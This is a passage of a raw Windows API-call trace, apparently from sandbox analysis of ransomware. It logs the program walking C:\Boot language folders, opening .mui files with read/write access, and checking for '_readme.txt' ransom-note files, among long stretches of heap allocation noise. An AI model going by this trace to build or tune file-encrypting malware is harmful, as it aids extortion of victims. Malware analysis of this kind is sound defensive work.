hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d28 | out: hHeap=0x4970000) returned 1 [0129.959] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0129.959] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.959] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d28 [0129.959] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.959] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\memtest.exe.mui") returned=".mui" [0129.959] CreateFileW (lpFileName="C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.959] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d28 | out: hHeap=0x4970000) returned 1 [0129.959] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3787dc0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3787dc0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3787dc0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0129.959] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.959] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x40) returned 0xdcf2d28 [0129.959] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.959] PathFindExtensionW (pszPath="C:\\Boot\\en-US\\_readme.txt") returned=".txt" [0129.959] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf2d28 | out: hHeap=0x4970000) returned 1 [0129.959] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3787dc0, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe3787dc0, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe3787dc0, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0129.959] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0129.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce97a0 | out: hHeap=0x4970000) returned 1 [0129.960] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0129.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce97a0 [0129.960] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0129.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0129.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.960] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.960] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.961] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.961] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0129.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0129.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.962] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.962] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0129.963] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.963] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.963] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.963] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.963] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0129.963] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.963] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.963] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0129.963] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0129.963] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9408 | out: hHeap=0x4970000) returned 1 [0129.963] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0129.963] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0129.963] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.963] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0129.963] PathFindFileNameW (pszPath="") returned="" [0129.963] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0129.964] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0129.964] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0129.964] FreeLibrary (hLibModule=0x759d0000) returned 1 [0129.964] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0129.964] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0129.965] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe37adf20, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37adf20, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0129.965] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe37adf20, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37adf20, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.965] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0129.965] PathFindExtensionW (pszPath="C:\\Boot\\es-ES\\bootmgr.exe.mui") returned=".mui" [0129.965] CreateFileW (lpFileName="C:\\Boot\\es-ES\\bootmgr.exe.mui" (normalized: "c:\\boot\\es-es\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0129.965] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37adf20, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe37adf20, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37adf20, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0129.965] PathFindExtensionW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned=".txt" [0129.965] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37adf20, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe37adf20, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37adf20, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0129.965] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0129.965] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0129.965] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0129.965] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0129.966] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2b08 [0129.966] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0129.966] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.966] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0129.966] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0129.966] PathFindFileNameW (pszPath="") returned="" [0129.966] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9408 [0129.966] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0129.966] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0129.966] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x800) returned 0x7516fe8 [0129.966] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0129.966] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x810) returned 0xdcd2b08 [0129.967] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9d90 [0129.967] FreeLibrary (hLibModule=0x759d0000) returned 1 [0129.967] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9d90 | out: hHeap=0x4970000) returned 1 [0129.967] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0129.967] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.967] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.967] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x81c) returned 0xdcd2b08 [0129.967] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0129.967] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0129.967] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9660 | out: hHeap=0x4970000) returned 1 [0129.967] PathFileExistsW (pszPath="C:\\Boot\\fi-FI\\_readme.txt") returned 1 [0129.967] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0129.967] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9660 [0129.967] FindFirstFileW (in: 